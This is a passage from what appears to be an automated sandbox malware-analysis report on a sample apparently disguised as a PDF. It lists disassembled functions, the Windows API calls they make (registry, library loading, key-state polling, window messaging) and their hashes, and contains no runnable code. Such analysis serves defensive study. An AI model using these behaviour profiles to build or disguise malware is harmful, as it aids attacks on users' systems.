                                                                          APIs
                                                                          • SetErrorMode.KERNEL32(00000001), ref: 00B4AEBF
                                                                          • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00B4AF13
                                                                          • __swprintf.LIBCMT ref: 00B4AF2C
                                                                          • SetErrorMode.KERNEL32(00000000,00000001,00000000,00B6F910), ref: 00B4AF6A
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorMode$InformationVolume__swprintf
                                                                          • String ID: %lu
                                                                          • API String ID: 3164766367-685833217
                                                                          • Opcode ID: 1a239c70344bfa97c3c275c6b2bc7a4052fd9063cd2521002630941a4ae92d6c
                                                                          • Instruction ID: afd56fec415a2b000895479b4f2f6b301c47a28df144d1dfd4b553c468a21e9b
                                                                          • Opcode Fuzzy Hash: 1a239c70344bfa97c3c275c6b2bc7a4052fd9063cd2521002630941a4ae92d6c
                                                                          • Instruction Fuzzy Hash: 28214130A00249AFCB10DF65DD85DEE7BF8EF49704B1040A9F909EB251DB71EA45DB61
                                                                          Function 00B3A52F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 68windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 00AE7D2C: _memmove.LIBCMT ref: 00AE7D66
                                                                            • Part of subcall function 00B3A37C: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00B3A399
                                                                            • Part of subcall function 00B3A37C: GetWindowThreadProcessId.USER32(?,00000000), ref: 00B3A3AC
                                                                            • Part of subcall function 00B3A37C: GetCurrentThreadId.KERNEL32 ref: 00B3A3B3
                                                                            • Part of subcall function 00B3A37C: AttachThreadInput.USER32(00000000), ref: 00B3A3BA
                                                                          • GetFocus.USER32 ref: 00B3A554
                                                                            • Part of subcall function 00B3A3C5: GetParent.USER32(?), ref: 00B3A3D3
                                                                          • GetClassNameW.USER32(?,?,00000100), ref: 00B3A59D
                                                                          • EnumChildWindows.USER32(?,00B3A615), ref: 00B3A5C5
                                                                          • __swprintf.LIBCMT ref: 00B3A5DF
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf_memmove
                                                                          • String ID: %s%d
                                                                          • API String ID: 1941087503-1110647743
                                                                          • Opcode ID: ef0385e5388935738956f4a4337184a798aeaf260b71b9ff749c93044f19530e
                                                                          • Instruction ID: 5b6bfa6168142791da5d3a4b6fd5ca06d6cdb920050563161b84fcb09941249e
                                                                          • Opcode Fuzzy Hash: ef0385e5388935738956f4a4337184a798aeaf260b71b9ff749c93044f19530e
                                                                          • Instruction Fuzzy Hash: 5811AF71604209ABDF10BF64EC8AFFA37B8AF48700F2440B5F948AA192CA7559458B75
                                                                          Function 00B42017 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 49COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • CharUpperBuffW.USER32(?,?), ref: 00B42048
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: BuffCharUpper
                                                                          • String ID: APPEND$EXISTS$KEYS$REMOVE
                                                                          • API String ID: 3964851224-769500911
                                                                          • Opcode ID: e896710dd04b178d483ddc0b11166a243969051f0e8fcbfd849e36628c37565f
                                                                          • Instruction ID: fbe40cdae612deef70cabbc877a89c788a378115e0f420adfc94a39915cf13b5
                                                                          • Opcode Fuzzy Hash: e896710dd04b178d483ddc0b11166a243969051f0e8fcbfd849e36628c37565f
                                                                          • Instruction Fuzzy Hash: CF1139319101199FCF00EFA4D9815AEB7F4FF26304F5085E8E855A7392EB326A06EB50
                                                                          Function 00B5EE69 Relevance: 7.7, APIs: 5, Instructions: 247COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00B5EF1B
                                                                          • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00B5EF4B
                                                                          • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 00B5F07E
                                                                          • CloseHandle.KERNEL32(?), ref: 00B5F0FF
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                                                          • String ID:
                                                                          • API String ID: 2364364464-0
                                                                          • Opcode ID: c0861e24de3c23b7f27f3c648de6e407ccb46b034dcbf89fa479578e76e244e8
                                                                          • Instruction ID: a9fbab13bff9741229de76450bcbb317e60808341128039bd938723391102156
                                                                          • Opcode Fuzzy Hash: c0861e24de3c23b7f27f3c648de6e407ccb46b034dcbf89fa479578e76e244e8
                                                                          • Instruction Fuzzy Hash: 90816FB16043019FD720EF29C986B2AB7E5EF48710F14886DF999DB292DBB0ED058B51
                                                                          Function 00B602C2 Relevance: 7.6, APIs: 5, Instructions: 144registryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 00AE7F41: _memmove.LIBCMT ref: 00AE7F82
                                                                            • Part of subcall function 00B610A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00B60038,?,?), ref: 00B610BC
                                                                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00B60388
                                                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00B603C7
                                                                          • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00B6040E
                                                                          • RegCloseKey.ADVAPI32(?,?), ref: 00B6043A
                                                                          • RegCloseKey.ADVAPI32(00000000), ref: 00B60447
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                                                                          • String ID:
                                                                          • API String ID: 3440857362-0
                                                                          • Opcode ID: cabb2c23103b16dafef6786bd1791534e8fd86727398c2364fcc65f935e4b89b
                                                                          • Instruction ID: c846f851292bf3601ecff966e150963381672cd6bfa6ebe90f5017908d74012f
                                                                          • Opcode Fuzzy Hash: cabb2c23103b16dafef6786bd1791534e8fd86727398c2364fcc65f935e4b89b
                                                                          • Instruction Fuzzy Hash: B6516731218245AFD704EF65D981E6FB7E8FF88304F04896DF596872A2DB74E904CB52
                                                                          Function 00B5DBDC Relevance: 7.6, APIs: 5, Instructions: 139libraryloaderCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 00AE9997: __itow.LIBCMT ref: 00AE99C2
                                                                            • Part of subcall function 00AE9997: __swprintf.LIBCMT ref: 00AE9A0C
                                                                          • LoadLibraryW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00B5DC3B
                                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 00B5DCBE
                                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 00B5DCDA
                                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 00B5DD1B
                                                                          • FreeLibrary.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00B5DD35
                                                                            • Part of subcall function 00AE5B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00B47B20,?,?,00000000), ref: 00AE5B8C
                                                                            • Part of subcall function 00AE5B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00B47B20,?,?,00000000,?,?), ref: 00AE5BB0
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                                                                          • String ID:
                                                                          • API String ID: 327935632-0
                                                                          • Opcode ID: e15f6714e37449ce999a58b5a70fb092829f05293e4119b6b36e3353a50e70cb
                                                                          • Instruction ID: 6797020acafb76e12e079a78e87e6c3d6ecf95f4900afd77668056551b8b78ae
                                                                          • Opcode Fuzzy Hash: e15f6714e37449ce999a58b5a70fb092829f05293e4119b6b36e3353a50e70cb
                                                                          • Instruction Fuzzy Hash: 53514935A00205DFCB10EF68C584AAEB7F4FF49311B1481A9E815AB362DB70ED45CF90
                                                                          Function 00B4E7DC Relevance: 7.6, APIs: 5, Instructions: 135COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00B4E88A
                                                                          • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 00B4E8B3
                                                                          • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00B4E8F2
                                                                            • Part of subcall function 00AE9997: __itow.LIBCMT ref: 00AE99C2
                                                                            • Part of subcall function 00AE9997: __swprintf.LIBCMT ref: 00AE9A0C
                                                                          • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00B4E917
                                                                          • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00B4E91F
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                                                          • String ID:
                                                                          • API String ID: 1389676194-0
                                                                          • Opcode ID: e6f9531eb3f143b45cb7ecdb21b100ca9334f00d0570957be3b53a46b1b96c26
                                                                          • Instruction ID: 2e95a3a261a1c0145d9a821767a96f67e26fdf79dab3a75d28e0f89a5a67f007
                                                                          • Opcode Fuzzy Hash: e6f9531eb3f143b45cb7ecdb21b100ca9334f00d0570957be3b53a46b1b96c26
                                                                          • Instruction Fuzzy Hash: 6F510A35A00245EFCF05EF65C9819AEBBF5FF48314B1480A9E949AB3A2DB31ED11DB50
                                                                          Function 00B6A2C5 Relevance: 7.6, APIs: 5, Instructions: 130COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 5099b1a8b1b46bda84eda4c344958c7fbdf517669aa0e874dafa0b4c04b4a218
                                                                          • Instruction ID: 2fb22d3cb1523ca05b60b045093cb877aaa6537bd471f0c4a9ef22de2fdf578c
                                                                          • Opcode Fuzzy Hash: 5099b1a8b1b46bda84eda4c344958c7fbdf517669aa0e874dafa0b4c04b4a218
                                                                          • Instruction Fuzzy Hash: 4541B235900104ABDB10DF28DC98FB9BBE8FB09310F1441A5E866B73E1DB78AD41DE55
                                                                          Function 00AE2344 Relevance: 7.6, APIs: 5, Instructions: 111keyboardCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetCursorPos.USER32(?), ref: 00AE2357
                                                                          • ScreenToClient.USER32(00BA67B0,?), ref: 00AE2374
                                                                          • GetAsyncKeyState.USER32(00000001), ref: 00AE2399
                                                                          • GetAsyncKeyState.USER32(00000002), ref: 00AE23A7
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: AsyncState$ClientCursorScreen
                                                                          • String ID:
                                                                          • API String ID: 4210589936-0
                                                                          • Opcode ID: a09779fe503f6c2126f166f0c112dfd92ef8f2b1c879ec1dd6134f56320d03d2
                                                                          • Instruction ID: ab58e08fca7b8fd5c3fa5c55aea6935eddaff53c95b9c550040853c6fcc3abc7
                                                                          • Opcode Fuzzy Hash: a09779fe503f6c2126f166f0c112dfd92ef8f2b1c879ec1dd6134f56320d03d2
                                                                          • Instruction Fuzzy Hash: 44418E3150415AFBDF159F69C844BE9BBB8FB05320F20436AF829A62A0C774AD90DF91
                                                                          Function 00B36920 Relevance: 7.6, APIs: 5, Instructions: 97windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00B3695D
                                                                          • TranslateAcceleratorW.USER32(?,?,?), ref: 00B369A9
                                                                          • TranslateMessage.USER32(?), ref: 00B369D2
                                                                          • DispatchMessageW.USER32(?), ref: 00B369DC
                                                                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00B369EB
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: Message$PeekTranslate$AcceleratorDispatch
                                                                          • String ID:
                                                                          • API String ID: 2108273632-0
                                                                          • Opcode ID: 3da3e5031b56dba6ce852ffd0be1ec18658f0fdf8c686ae89892864efd3075d6
                                                                          • Instruction ID: 8abca749482a7b9912b7c7e58bcc4435181b8622ebc81368579737f2d08baaf9
                                                                          • Opcode Fuzzy Hash: 3da3e5031b56dba6ce852ffd0be1ec18658f0fdf8c686ae89892864efd3075d6
                                                                          • Instruction Fuzzy Hash: 5831E571904246BADB21CF74DC85BB67BECEB16300F2482A5E421C71A0DB74D885D790
                                                                          Function 00B38F01 Relevance: 7.6, APIs: 5, Instructions: 89sleepwindowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetWindowRect.USER32(?,?), ref: 00B38F12
                                                                          • PostMessageW.USER32(?,00000201,00000001), ref: 00B38FBC
                                                                          • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00B38FC4
                                                                          • PostMessageW.USER32(?,00000202,00000000), ref: 00B38FD2
                                                                          • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00B38FDA
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: MessagePostSleep$RectWindow
                                                                          • String ID:
                                                                          • API String ID: 3382505437-0
                                                                          • Opcode ID: aa1819a4e56e37303691b3835a64007582147734f37220e2fea185486aa474bc
                                                                          • Instruction ID: d1a69ae2a42c37ede75609c29da105fedc79f4d9f58537aa8d619e80ee305b35
                                                                          • Opcode Fuzzy Hash: aa1819a4e56e37303691b3835a64007582147734f37220e2fea185486aa474bc
                                                                          • Instruction Fuzzy Hash: 9B31E07150021AEFDF00CF68D94CAAE7BB6FB04315F204669F924EB1D0CBB49910CB91
                                                                          Function 00B3B6AF Relevance: 7.6, APIs: 5, Instructions: 88windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • IsWindowVisible.USER32(?), ref: 00B3B6C7
                                                                          • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00B3B6E4
                                                                          • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00B3B71C
                                                                          • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00B3B742
                                                                          • _wcsstr.LIBCMT ref: 00B3B74C
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                                                          • String ID:
                                                                          • API String ID: 3902887630-0
                                                                          • Opcode ID: 3299598ddb1cc8b5c5f0d255112dd4645dafac92d61faee1e242ffe03273ee90
                                                                          • Instruction ID: 2747b0c480f4b58001abf48848958848dae971312b8e0260a0969b3074f5002c
                                                                          • Opcode Fuzzy Hash: 3299598ddb1cc8b5c5f0d255112dd4645dafac92d61faee1e242ffe03273ee90
                                                                          • Instruction Fuzzy Hash: C5210732204204BAEB255B39EC4AE7B7BD8DF85710F2040ADF905CA1A5EF65CC4092A0
                                                                          Function 00B6B405 Relevance: 7.6, APIs: 5, Instructions: 85COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 00AE2612: GetWindowLongW.USER32(?,000000EB), ref: 00AE2623
                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 00B6B44C
                                                                          • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 00B6B471
                                                                          • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00B6B489
                                                                          • GetSystemMetrics.USER32(00000004), ref: 00B6B4B2
                                                                          • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,00B51184,00000000), ref: 00B6B4D0
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: Window$Long$MetricsSystem
                                                                          • String ID:
                                                                          • API String ID: 2294984445-0
                                                                          • Opcode ID: 7f5704a267e931129c011b26a29b24b24cf7402de3bc978d66d5a2afdda7faf2
                                                                          • Instruction ID: 9ac40388bdcf1d9bd3ea6cd9a0d34d733a2e701f4c0c334ed571482142944c1e
                                                                          • Opcode Fuzzy Hash: 7f5704a267e931129c011b26a29b24b24cf7402de3bc978d66d5a2afdda7faf2
                                                                          • Instruction Fuzzy Hash: 8A216071514256AFCB109F389C44E6A37E4FB05720B144779F926D72E1EF389890DB90
                                                                          Function 00B397E9 Relevance: 7.6, APIs: 5, Instructions: 84windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00B39802
                                                                            • Part of subcall function 00AE7D2C: _memmove.LIBCMT ref: 00AE7D66
                                                                          • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00B39834
                                                                          • __itow.LIBCMT ref: 00B3984C
                                                                          • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00B39874
                                                                          • __itow.LIBCMT ref: 00B39885
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend$__itow$_memmove
                                                                          • String ID:
                                                                          • API String ID: 2983881199-0
                                                                          • Opcode ID: 5cb11c68208e2760b12a209a0620253aefdb127d7e8056376f3812501a8aa664
                                                                          • Instruction ID: 0fa226f9fadd5026301607061ffe05d7e27fcde736c9f93f891e4519335fedc3
                                                                          • Opcode Fuzzy Hash: 5cb11c68208e2760b12a209a0620253aefdb127d7e8056376f3812501a8aa664
                                                                          • Instruction Fuzzy Hash: 7D21C531B00244BBDB109A65DC8AEAE7BE8EF8A750F1400A9F904DB291DAB08D41C7A1
                                                                          Function 00AE12F3 Relevance: 7.6, APIs: 5, Instructions: 67COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00AE134D
                                                                          • SelectObject.GDI32(?,00000000), ref: 00AE135C
                                                                          • BeginPath.GDI32(?), ref: 00AE1373
